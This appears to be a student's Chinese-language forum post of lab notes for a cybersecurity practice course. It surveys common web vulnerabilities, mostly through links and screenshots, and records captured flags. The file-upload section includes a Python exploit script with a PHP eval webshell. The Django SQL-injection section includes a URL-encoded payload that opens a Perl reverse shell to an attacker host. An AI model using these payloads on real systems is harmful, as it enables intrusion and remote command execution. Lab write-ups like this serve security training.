网络安全综合实践

本贴最后更新于 198 天前,其中的信息可能已经东海扬尘

image

第 1 章 敏感信息泄露

敏感信息泄露

vmc{tOzofoDtYKhvrsJ2etdHpwPyQb9A7KX8}

CVE-2021-36749: Apache Druid 任意文件读取复现-腾讯云开发者社区-腾讯云 (tencent.com)

image

第 2 章 文件上传漏洞

PHP 文件上传

jquery-upload-file/php/upload.php at master · hayageek/jquery-upload-file (github.com)

import requests

url = 'http://10.12.153.110:32803/jquery-upload-file/php/upload.php'  # Replace with the actual URL of your API endpoint
file_path = './1.php'  # Replace with the actual file path you want to upload

files = {'myfile': open(file_path, 'rb')}

response = requests.post(url, files=files)

if response.status_code == 200:
    print('File uploaded successfully.')
else:
    print('File upload failed:', response.text)

response = requests.get('http://10.12.153.110:32803/jquery-upload-file/php/uploads/1.php?cmd=system("cat /flag");')
print(response.text)
1.php
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST['cmd']);
} else {
    highlight_file(__FILE__);
}
?>

$ python -u "c:\Users\sparks20\Desktop\综合实践4\1.py"
File uploaded successfully.
1.php
vmc{RnpkdnUK4jHrzaXERAQl2sS2BDg7Aoic}

JSP 文件上传

漏洞复现——weblogic 任意文件上传(cve-2018-2894) - --肆零肆 - 博客园 (cnblogs.com)

01 Work home dir:​/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

02 http proxy host: ws_utc

03 http proxy port:80

image

JspSpy.jsp/JspSpy.jsp at master · reedinthinking/JspSpy.jsp (github.com)

image​​​​​

image

upload-labs 靶场

【精选】Upload-labs 1-21 关 靶场通关攻略(全网最全最完整)_upload 靶场-CSDN 博客

image​​image

image

第 3 章 反序列化漏洞

Java 反序列化漏洞

详细 shiro 漏洞复现及利用方法(CVE-2016-4437)_糊涂是福 yyyy 的博客-CSDN 博客

image

PHP 反序列化漏洞

Phpmyadmin 2.X 反序列化漏洞(WooYun-2016-199433) - whited - 博客园 (cnblogs.com)

image

weblogic 反序列化

KimJun1010/WeblogicTool: WeblogicTool,GUI 漏洞利用工具,支持漏洞检测、命令执行、内存马注入、密码解密等(深信服深蓝实验室天威战队强力驱动) (github.com)

image

第 4 章 权限绕过漏洞

Openfire 身份认证绕过

CVE-2023-32315:Openfire 身份认证绕过漏洞-腾讯云开发者社区-腾讯云 (tencent.com)

​​imagetangxiaofeng7/CVE-2023-32315-Openfire-Bypass: rce (github.com)

image

saltstack 权限绕过

SaltStack-Exp/exp.py at master · bravery9/SaltStack-Exp (github.com)

396522bf268ae9bbca397845ddf29603_720

第 5 章 弱口令漏洞

Tomcat-pass-getshell 弱口令

【Vulfocus 漏洞复现】tomcat-cve_2017_12615_青果 @ 的博客-CSDN 博客

image​​image

口令破解

Weblogic 漏洞复现攻与防系列二:Weblogic 后台密码破解与防护-腾讯云开发者社区-腾讯云 (tencent.com)

image

第 6 章 远程代码/命令执行漏洞

Metabase 远程命令执行漏洞

securezeron/CVE-2023-38646: POC for CVE-2023-38646 (github.com)

image

image

Weblogic 未授权远程代码执行漏洞

houqe/POC_CVE-2023-21839: CVE-2023-21839 Python 版本 (github.com)

elFinder ZIP

vulhub/elfinder/CVE-2021-32682/README.zh-cn.md at master · vulhub/vulhub (github.com)

image

image

image

image

Log4j2 漏洞利用

log4j 漏洞复现 - lalalaxiaoyuren - 博客园 (cnblogs.com)

image

thinkphp 远程代码执行

vulhub/thinkphp/5.0.23-rce/README.zh-cn.md at master · vulhub/vulhub (github.com)

image

第 7 章 模板注入漏洞

SSTI 模板注入漏洞

vulhub/flask/ssti at master · vulhub/vulhub (github.com)

image

第 8 章 外部实体注入漏洞

Apache Solr 外部实体注入

漏洞复现-CVE-2017-12629-RCE-solr:XXE - 铺哩 - 博客园 (cnblogs.com)

vulhub/solr/CVE-2017-12629-RCE/README.md at master · vulhub/vulhub (github.com)

缺少 demo core

第 9 章 SQL 注入漏洞

Django SQL 注入

imageimageimage

image​​image

http://10.12.153.112:33343/admin/vuln/collection/?detail__a')%3d'1' or 1%3d1 %3BCOPY%20cmd_exec%20FROM%20PROGRAM%20'perl%20-MIO%20-e%20''%24p%3Dfork%3Bexit%2Cif(%24p)%3B%24c%3Dnew%20IO%3A%3ASocket%3A%3AINET(PeerAddr%2C%2210%2E12%2E172%2E26%3A5555%22)%3BSTDIN-%3Efdopen(%24c%2Cr)%3B%24~-%3Efdopen(%24c%2Cw)%3Bsystem%24_%20while%3C%3E%3B'''%3B--%20

sql-labs 靶场

image

​​image​​

moveit SQL 注入

第 10 章 文件包含漏洞

librsvg XInclude 文件包含漏洞

vulhub/librsvg/CVE-2023-38633/README.md at master · vulhub/vulhub (github.com)

image

image

vmc{zgE7hBltKRLd2RaxSKFPZhX7vfizqHHq}

PHP 文件包含漏洞

通过 CVE-2014-8959 漏洞深入理解 PHP 文件包含漏洞 |NOSEC 安全讯息平台 - 白帽汇安全研究院​​​​

image

第 11 章 服务端请求伪造漏洞

SSRF 漏洞

[De1CTF 2019]SSRF Me - 掘金 (juejin.cn)​​

image​​image

第 12 章 Linux 远程溢出漏洞

Linux 远程溢出漏洞

2019 新生杯 pwn writeup-CSDN 博客

image

第 13 章 漏洞综合利用

CMS 代码审计

image

DVWA 靶场

image

image

pikachu 靶场

image

  • 安全

    安全永远都不是一个小问题。

    191 引用 • 813 回帖
3 操作
Sparks 在 2023-12-18 23:47:22 更新了该帖
Sparks 在 2023-11-22 23:10:31 更新了该帖
Sparks 在 2023-11-20 14:52:23 更新了该帖

相关帖子

欢迎来到这里!

我们正在构建一个小众社区,大家在这里相互信任,以平等 • 自由 • 奔放的价值观进行分享交流。最终,希望大家能够找到与自己志同道合的伙伴,共同成长。

注册 关于
请输入回帖内容 ...